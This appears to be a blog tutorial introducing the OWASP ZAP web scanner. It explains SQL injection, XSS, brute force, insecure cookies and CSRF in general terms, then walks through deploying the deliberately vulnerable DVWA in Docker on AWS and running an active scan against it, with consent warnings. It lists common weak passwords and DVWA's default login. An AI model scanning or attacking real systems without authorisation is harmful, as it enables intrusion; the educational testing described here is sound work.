OWASP ZAP (Zed Attack Proxy)
OWASP ZAP is a popular open-source web application security scanner developed by the Open Web Application Security Project (OWASP).
You can think of ZAP more like a middle-man attack simulator. It attacks websites just like how a hacker would and informs us of vulnerabilities before our website goes live. This makes the site more secure and trustworthy. ZAP is widely used due to its powerful vulnerability scanning capabilities.
Before we dive into how OWASP ZAP works, let’s understand some common vulnerabilities using real-time examples:
⚠️ Caution: Do not scan unknown or third-party websites without the owner's explicit consent. Since ZAP actively tests for vulnerabilities (similar to how attackers operate), using it without permission may result in legal consequences.
𧨠SQL Injection (SQLi)
What it is: SQL Injection allows attackers to manipulate SQL queries by injecting malicious input, potentially gaining unauthorized access or deleting entire databases.
It can lead to critical impacts like full database deletion.
Case Study: Heartland Payment Systems Data Breach
⚠️ Cross-Site Scripting (XSS)
What it is: A hacker injects malicious JavaScript code into a web page viewed by others. It runs in the victim's browser — not on the server.
π‘️ Example: A seller on an e-commerce site might add a script in their product description. If the input isn’t filtered, the script runs when a buyer views it.
- Steals cookies or login session
- Redirects user to a fake login page
- Loads malware from external sources
It doesn’t harm your site directly but abuses it to harm users.
Case Study: eBay XSS Breach
π What is Brute Force?
Brute Force Attack involves an attacker repeatedly trying different username/password combinations — usually with automation tools.
π Examples:
- Using common passwords like
admin,123456,password - Using leaked credential lists
Case Study: GitHub Credential Stuffing Attack
π How Cookies Work: Step-by-Step
- You visit a website for the first time.
- The server sends a
Set-Cookieheader: - Your browser stores the cookie.
- When you revisit, browser sends it back:
Set-Cookie: sessionId=abc123; Path=/; HttpOnly; SecureCookie: sessionId=abc123This identifies your session and may prevent repeated logins. Cookies are also used for tracking and personalisation for ads
πͺ What Are Insecure Cookies?
Cookies are used to:
- Store session data (e.g., logged-in state)
- Track user behavior across pages
Insecure cookies are:
- Not marked
HttpOnly– JavaScript can access them - Not marked
Secure– can be sent over unencrypted HTTP - Not using
SameSite– vulnerable to CSRF attacks
If an attacker steals your session cookie, they can impersonate you.
Use Case: Yahoo Data Breach
π What is CSRF? (Cross-Site Request Forgery)
CSRF is when an attacker tricks a logged-in user’s browser into sending unintended requests to a web app without consent.
π Example:
- You log in to your bank website.
- Browser stores session cookie.
- You open a malicious site in another tab.
- The malicious site sends a hidden request to your bank (e.g., money transfer).
- Your bank accepts it because the cookie is valid.
- Money is transferred without your knowledge!
π ️ ZAP INSTALLATION
Download OWASP ZAP locally based on your operating system. If you're using Linux, it's recommended to use Kali Linux or ensure that your Linux distribution has a GUI installed, as ZAP requires a graphical interface.
⚠️ Caution: Do not scan unknown or third-party websites without the owner's explicit consent. Since ZAP actively tests for vulnerabilities (similar to how attackers operate), using it without permission may result in legal consequences.
π Let's Use DVWA (Damn Vulnerable Web Application) as Our Test Target
We’ll deploy DVWA on an AWS EC2 instance and run it using Docker. Follow these steps to get started:
π§ Step 1: Install Docker on Your EC2 Instance
# Update your system and install prerequisites
sudo apt-get update
sudo apt-get install ca-certificates curl
# Create Docker GPG keyring directory
sudo install -m 0755 -d /etc/apt/keyrings
# Download and add Docker's GPG key
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
# Add Docker repository
echo \
"deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \
$(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
# Install Docker packages
sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
π₯ Step 2: Run DVWA in Docker
You can check the source code of DVWA on DVWA GitHub and explore other installation methods in the README.
# Pull and run DVWA container
sudo docker run -it -p 8080:80 -d vulnerables/web-dvwa
π Step 3: Access DVWA in Your Browser
Open your browser and go to:
http://<AWS_EC2_PUBLIC_IP>:8080Make sure to allow port 8080 in your AWS EC2 security group’s inbound rules.
Login Credentials:
- Username: admin
- Password: password
⚙️ Use OWASP ZAP to Scan DVWA
- Open the OWASP ZAP application.
- Enter the DVWA URL (
http://<EC2_IP>:8080) into the Active Scan input field. - Click on the Attack button.
- ZAP will automatically scan the site for known vulnerabilities and display detailed results.
✅ ZAP not only finds the vulnerabilities but often provides explanations and suggested solutions to fix them — making it a great tool for developers and security testers.
Comments
Post a Comment